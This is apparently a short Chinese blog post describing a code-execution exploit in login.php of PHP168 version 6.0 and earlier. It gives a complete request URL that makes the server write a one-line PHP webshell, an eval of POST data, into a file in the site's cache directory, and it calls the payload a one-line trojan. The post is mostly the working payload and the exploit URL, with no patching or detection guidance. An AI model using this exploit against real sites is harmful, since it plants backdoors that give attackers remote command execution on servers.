PHP168 6.0及以下版本login.php代码执行

在其域名后加上这样一段代码：

这段代码的意思利用login.php文件将

<?php%20@eval($_POST[cmd]);?>

这段代码写入到网站缓存目录 cache的xx.php文件中。“<?php%20@eval($_POST[cmd]);?>”就是一句话木马的服务端。

URL是

http://www.xx.com/login.php?makehtml=1&chdb[htmlname]=xx.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>

posted @ 2014-12-18 05:30 Hookjoy 阅读(691) 评论(0) 编辑收藏举报

刷新页面返回顶部

err0">